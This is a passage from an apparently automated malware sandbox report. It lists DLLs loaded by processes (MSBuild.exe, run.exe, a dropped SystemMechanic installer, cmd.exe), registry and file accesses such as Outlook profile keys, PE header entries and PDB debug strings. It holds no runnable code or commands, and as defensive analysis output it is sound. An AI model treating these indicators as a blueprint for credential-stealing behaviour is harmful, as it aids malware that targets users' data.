                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwrite.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msvcp140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windowscodecs.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwmapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d9.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d10warp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wtsapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winsta.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: powrprof.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: umpdc.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dataexchange.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d11.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dcomp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxgi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msctfui.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uiautomationcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3dcompiler_47.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasman.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rtutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: oledlg.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: oleacc.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: wtsapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: samcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: dwmapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: riched20.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: usp10.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: msls31.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: dbghelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: pla.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: pdh.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: tdh.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: cabinet.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: wevtapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: shdocvw.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: wxfSIz4PAi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: wxfSIz4PAi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: wxfSIz4PAi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: wxfSIz4PAi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: wxfSIz4PAi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: wxfSIz4PAi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: wxfSIz4PAi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: mozglue.pdbP source: u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb@ source: u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920960862.000002727C8E0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1866972606.0000000003900000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1867218514.0000000003DB7000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1866008850.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163183799.0000000005416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163536288.00000000058F0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292633080.000000000471F000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292037261.0000000004260000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: mozglue.pdb source: u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000000.1783099524.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1863586625.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2259125869.000000000031C000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913830974.000002721BAF0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920246621.000002727C780000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1867767738.000000006C8A7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000014.00000002.2293392231.000000006CCC7000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920787436.000002727C8D0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920330280.000002727C790000.00000004.08000000.00040000.00000000.sdmp
